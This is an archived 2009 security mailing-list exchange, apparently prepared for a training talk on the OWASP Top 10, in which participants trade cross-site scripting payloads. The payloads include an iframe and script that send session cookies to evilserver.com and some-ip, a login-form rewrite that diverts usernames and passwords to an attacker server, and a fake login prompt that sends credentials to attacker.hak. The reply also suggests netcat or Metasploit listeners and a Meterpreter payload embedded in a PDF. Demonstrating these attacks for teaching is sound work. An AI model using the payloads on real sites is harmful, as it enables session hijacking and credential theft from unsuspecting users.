Cool things to inject via XSS

[christopher.riley at r-it.at (christopher.riley at r-it.at)]

You could use a couple of typical password/cookie stealing examples.

Cookie stealing iframe.:
"><IFRAME
SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie";
 height="1" width="1" frameborder="0"></IFRAME>

Altering the logon form.:
"><script>window.onload =
function()document.loginForm.action='http://evilserver.com/evil.php?details=&apos;</script><!----

I like to use the logon form example for my penetration testing
presentations as it looks 100% normal to the user, except it redirects the
Submit button to send the logon information (username/password in most
cases) to your evilserver instead of the real server. You can also rewrite
the code in the users browser to remove password hashing to make it easier
to get the clear text password. On the server end I usually just put up a
Metasploit HTTP or a netcat listener on the evilserver.com address to
output the traffic to a logfile. You can also log it to a Database for mass
farming of data, but we don't do that kind of thing, we leave that to Bob
;)

If you want something evil on the client-side, try an iframe that
references a PDF file. You can then export a PDF from Metasploit and embed
the Meterpreter payload for total world domination.

Chris John Riley

pauldotcom-bounces at mail.pauldotcom.com@inet wrote on 28.05.2009 20:50:39:

> Ok, I've got yet another presentation coming up, this time on the OWASP
Top 10
> and Mutillidae. One of the things I'm going to cover is XSS. The
canonical
> example of course is:
>
> <script>alert("XSS");</script>
>
> but that is boring, and gives folks the impression that XSS is not that
> serious.? Better short eample swoul be:
>
> Redirect traffic to your site:
> <script>window.location = "http://www.irongeek.com/";</script>
>
> A little cookie Grabbing:
> <script>
> new Image().src="http://some-ip/mutillidae/catch.php?cookie=
> "+encodeURI(document.cookie);
> </script>
>
> Or maybe a password form to make people think they have to login, but it
just
> grabs the credentials:
> <script>
> username=prompt('Please enter your username',' ');
> password=prompt('Please enter your password',' ');
> document.write("<img src=\"http://attacker.hak/catch.php?username=
> "+username+"&password="+password+"\">");
> </script>
>
> What are other cool thing to inject, besides maybe BeEF, that shows of
how XSS
> can be a big deal?
>
> Thanks,
> Adrian
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
----------------------------------------
Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, DVR
0486809, UID ATU 16351908

Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail
dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche
Erklaerungen duerfen ueber dieses Medium nicht ausgetauscht werden.
Correspondence with above mentioned sender via e-mail is only for
information purposes. This medium may not be used for exchange of
legally-binding communications.
----------------------------------------
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090529/e2d63b1e/attachment.htm